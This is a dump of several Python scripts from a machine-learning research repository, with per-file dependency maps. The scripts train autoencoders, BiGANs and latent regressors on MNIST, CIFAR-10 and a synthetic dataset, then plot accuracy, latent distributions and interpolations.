        # Classifier with frozen e learned from autoencoder
        mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)
        # Classifier with randomly initialized e.
        # Uses classifier_e_trainable_model, consistent with the rest of this
        # file: the original classifier_e_free_model is undefined (NameError).
        random_e = encoder_model()
        mnist_classifier_random_e = classifier_e_trainable_model(random_e)

    # Record average classification accuracy for each no. of labelled examples
    classifier_pretrained_acc[index] = 100 * pretrained_acc_sum / num_iterations
    classifier_random_acc[index] = 100 * random_acc_sum / num_iterations
# Plot comparison graph of both classifiers
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.show()

# Plot for just pretrained network
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o')
# Fixed: the title was missing its closing parenthesis.
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()

# Plot for just purely supervised network.
# (The two-entry legend copied from the comparison plot was dropped: this
# figure shows a single curve and the labels were misleading.)
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,509 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_bigan_stochastic_train.py | from keras.optimizers import Adam
import numpy as np
from cifar10_models import encoder_model, generator_model, discriminator_model, bigan_model
from semi_supervised_comparison.functions.auxiliary_funcs import save_models
from semi_supervised_comparison.functions.visualization_funcs import save_imgs, plot_gan_batch_loss,\
plot_gan_epoch_loss, save_reconstructions
from semi_supervised_comparison.functions.data_funcs import get_cifar10
# ---------------------------------------------------------------------------
# Setup: constants, CIFAR-10 data, and two compiled views of the same BiGAN
# (one training the discriminator, one training the generator + encoder).
# ---------------------------------------------------------------------------
# Set random seed
np.random.seed(1330)

# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_bigan'  # where sample/reconstruction images are written
model_path = 'Models/cifar10_bigan'  # where trained weights are saved

# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()

# =====================================
# Instantiate models
# =====================================
generator = generator_model()
encoder = encoder_model()
discriminator = discriminator_model()

# Adam hyper-parameters shared by both optimisers
lr = 1e-4
beta_1 = 0.5
beta_2 = 0.999
opt_d = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
opt_g = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)

# View 1: only the discriminator trainable (generator/encoder frozen)
generator.trainable = False
encoder.trainable = False
bigan_discriminator = bigan_model(generator, encoder, discriminator)
bigan_discriminator.compile(optimizer=opt_d, loss='binary_crossentropy')

# View 2: generator and encoder trainable, discriminator frozen
generator.trainable = True
encoder.trainable = True
discriminator.trainable = False
bigan_generator = bigan_model(generator, encoder, discriminator)
bigan_generator.compile(optimizer=opt_g, loss='binary_crossentropy')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 2000
batch_size = 100

# Training settings
num_batches = int(X_train.shape[0] / batch_size)
epoch_save_interval = 10  # epochs between saved image samples / model weights

# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)

# Train for set number of epochs
for epoch in range(epochs):
    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))

    # Set epoch losses to zero
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0

    # Shuffle training set.
    # NOTE(review): np.random.randint samples indices *with* replacement, so
    # this is a bootstrap resample rather than a permutation — confirm whether
    # np.random.permutation was intended.
    new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
    X_train = X_train[new_permutation]

    # Train on all batches
    for batch in range(num_batches):
        # Select next batch of images from training set
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]

        # Draw a standard-normal latent batch
        z = np.random.normal(size=(batch_size, 1, 1, latent_dim))

        # Create labels for discriminator inputs
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))

        # ---------------------
        #  Train Discriminator
        # ---------------------
        # Train the discriminator (img -> z is valid, z -> img is fake)
        d_loss = bigan_discriminator.train_on_batch([z, imgs], [fake, valid])

        # Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]

        # ----------------------------
        #  Train Generator and Encoder
        # ----------------------------
        # Train the generator (z -> img_ is valid and img -> z_ is invalid)
        ge_loss = bigan_generator.train_on_batch([z, imgs], [valid, fake])
        g_batch_loss_trajectory[epoch * num_batches + batch] = ge_loss[0]
        g_epoch_loss_sum += ge_loss[0]

        # Print progress.
        # NOTE(review): bigan_discriminator is compiled without metrics, so
        # d_loss[1] is a per-output loss, not an accuracy — the "acc" label in
        # this message is misleading.
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1], ge_loss[0]))

    # Get epoch loss data (mean of batch losses)
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches

    # If at save interval, save generated image samples
    if epoch % epoch_save_interval == 0:
        z = np.random.normal(size=(25, 1, 1, latent_dim))
        gen_imgs = generator.predict(z)
        save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)

# Save models to file
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualize results
# =====================================
# Save reconstructions of test images (presumably x -> E(x) -> G(E(x)),
# given the encoder and generator are passed in — behaviour lives in
# save_reconstructions)
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)

# Plot loss curves at batch and epoch granularity
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,510 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_lr_train.py | from __future__ import print_function, division
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sd_models import encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_loss
# Set random seed for reproducibility
np.random.seed(12345)

# =====================================
# Define constants
# =====================================

img_dim = 4   # flattened image length (2 x 2) -- not referenced below in this script
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2        # dimensionality of the latent space
num_classes = 16      # number of classes in the synthetic dataset
image_path = 'Images/sd_lr'   # prefix for saved figures
model_path = 'Models/sd_lr'   # prefix for saved model weights
# =====================================
# Load dataset
# =====================================

# Load the synthetic dataset from text files: images as float32, labels as
# integers. (`np.int` was a deprecated alias for the builtin `int` and was
# removed in NumPy 1.24 -- use the builtin directly; loadtxt then produces
# the platform default integer dtype, same as the old alias did.)
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=int)

# Reshape flat vectors to image format: (samples, rows, cols, channels)
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)

# Normalize data from [0, 1] to (-1, 1)
# (presumably to match the GAN generator's output range -- confirm)
X_train = (X_train - 0.5) / 0.5
X_test = (X_test - 0.5) / 0.5

# Samples from the latent prior used to train the latent regressor
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================

# Instantiate models
encoder = encoder_model()
generator = generator_model(gan=True)
latent_regressor = latent_reconstructor_model(generator, encoder)

# Compile latent regressor: the generator carries pretrained GAN weights and
# is frozen, so only the encoder is updated during training
generator.load_weights('Models/sd_gan_generator.h5')
generator.trainable = False
# NOTE(review): 'accuracy' is not a meaningful metric for an MSE regression
latent_regressor.compile(optimizer='SGD', loss='mse', metrics=['accuracy'])

# =====================================
# Train models
# =====================================

# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5   # epochs without val_loss improvement before stopping

# Specify training stopping criterion and best-model checkpointing
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                   mode='min')
callbacks = [early_stopping, model_checkpoint]

# Train model: input and target are both z, so the composed model is trained
# to make its output reconstruct the latent sample it was fed
history = latent_regressor.fit(z_train, z_train,
                               epochs=epochs,
                               batch_size=batch_size,
                               shuffle=True,
                               validation_data=(z_test, z_test),
                               callbacks=callbacks,
                               verbose=1)

# Replace current encoder and decoder models with that from the saved best checkpoint
# NOTE(review): this decoder is built without gan=True, unlike the trained
# generator above -- confirm the two architectures have identical weights layout
decoder = generator_model()
encoder = encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')

# Save encoder weights
save_models(path=model_path, encoder=encoder)

# =====================================
# Visualization
# =====================================

# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)

# Save latent visualization
save_latent_vis(image_path, X_train, y_train, encoder, num_classes)

# Plot training curves
plot_train_loss(image_path, history)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,511 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_latent_space_statistics.py | from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import encoder_model, deterministic_encoder_model
# Define constants
num_classes = 10
latent_dim = 64

# Load the trained deterministic BiGAN encoder
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')

# Load CIFAR-10 data and split into train and test set
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)   # NOTE(review): unused below
y_train = y_train.reshape((y_train.shape[0]))   # flatten (n, 1) label column to (n,)

# Encode the training set into the 64-D latent space
latent_spaces = encoder.predict(X_train)

# Get max and min value of entire set for later plotting purposes
# NOTE(review): these names shadow the builtins min/max for the rest of the script
max = np.max(latent_spaces)
min = np.min(latent_spaces)

# Split training set latent codes by class (CIFAR-10 label order 0..9)
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]

# Create list of all latent arrays, indexed by class label
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
               latent_horse, latent_ship, latent_truck)
# Histogram each of the 64 latent dimensions over the whole training set,
# laid out as an 8 x 8 grid of subplots
plt.figure()
for i in range(latent_dim):
    ax = plt.subplot(8, 8, i + 1)
    plt.hist(latent_spaces[:,i], 100, facecolor='green', alpha=0.5)
    plt.xlim(min, max)   # common axis range across all subplots
    plt.ylim(0, 2000)
    # keep axis labels only on subplot index 56 (first plot of the bottom row)
    if i != 56:
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
plt.savefig('Images/cifar10_bigan_encoder_latent_distribution_training_set')

# Generate distribution of each latent dimension for each individual class
# NOTE(review): the loop variable `set` shadows the builtin set()
for i, set in enumerate(latent_sets):
    plt.figure()
    for j in range(latent_dim):
        ax = plt.subplot(8, 8, j + 1)
        plt.hist(set[:,j], 100, facecolor='green', alpha=0.5)
        plt.xlim(min, max)
        plt.ylim(0, 200)   # smaller y-range: each class has ~1/10 of the samples
        if j != 56:
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
plt.savefig('Images/cifar10_bigan_encoder_latent_distribution_class_%d' % i) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], 
"/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,512 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_interpol.py | import numpy as np
from random import randint
from keras.datasets import mnist
from mnist_conv_ae_models import *
import matplotlib.pyplot as plt
import scipy.stats
(x_train, y_train), (x_test, y_test) = mnist.load_data()

# Scale pixel values to [0, 1]
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))  # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))  # adapt this if using `channels_first` image data format

num_steps = 7   # number of interpolation points between the two endpoints

# Shows linear interpolation in image space vs latent space
print("Generating interpolations...")

# Create micro batch of two randomly chosen test images.
# random.randint is inclusive on BOTH ends, so the upper bound must be
# shape[0] - 1; the original bound of shape[0] could raise IndexError.
X = np.array([x_test[randint(0, x_test.shape[0] - 1)],
              x_test[randint(0, x_test.shape[0] - 1)]])

# Build encoder and decoder models and restore trained weights
encoder = encoder_model()
encoder.load_weights('encoder.h5')
decoder = decoder_model()
decoder.load_weights('decoder.h5')
# Compute latent space projection of the two endpoint images
latentX = encoder.predict(X)
latentStart, latentEnd = latentX

# Keep the original images for the pixel-space comparison row
startImage, endImage = X

vectors = []        # latent-space interpolants
normalImages = []   # pixel-space interpolants

# Linear interpolation coefficients from 0 to 1
alphaValues = np.linspace(0, 1, num_steps)
for alpha in alphaValues:
    # Latent space interpolation
    vector = latentStart * (1 - alpha) + latentEnd * alpha
    vectors.append(vector)
    # Image space interpolation
    blendImage = (1 - alpha) * startImage + alpha * endImage
    normalImages.append(blendImage)

# Decode latent space vectors back to images
vectors = np.array(vectors)
reconstructions = decoder.predict(vectors)
# NOTE(review): decoder outputs are rescaled to [0, 255] while normalImages
# remain in [0, 1]; imshow appears to autoscale each image -- confirm
reconstructions *= 255

# Convert pixel-space images for use in plotting
normalImages = np.array(normalImages)

# Plot both interpolation paths: pixel space on top, latent space below
plt.figure(figsize=(20, 4))
n = len(reconstructions)
for i in range(n):
    # Display interpolation in pixel-space
    ax = plt.subplot(2, n, i + 1)
    plt.imshow(normalImages[i].reshape(28,28))
    plt.gray()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
    # Display interpolation in latent space
    ax = plt.subplot(2, n, i + 1 + n)
    plt.imshow(reconstructions[i].reshape(28, 28))
    plt.gray()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", 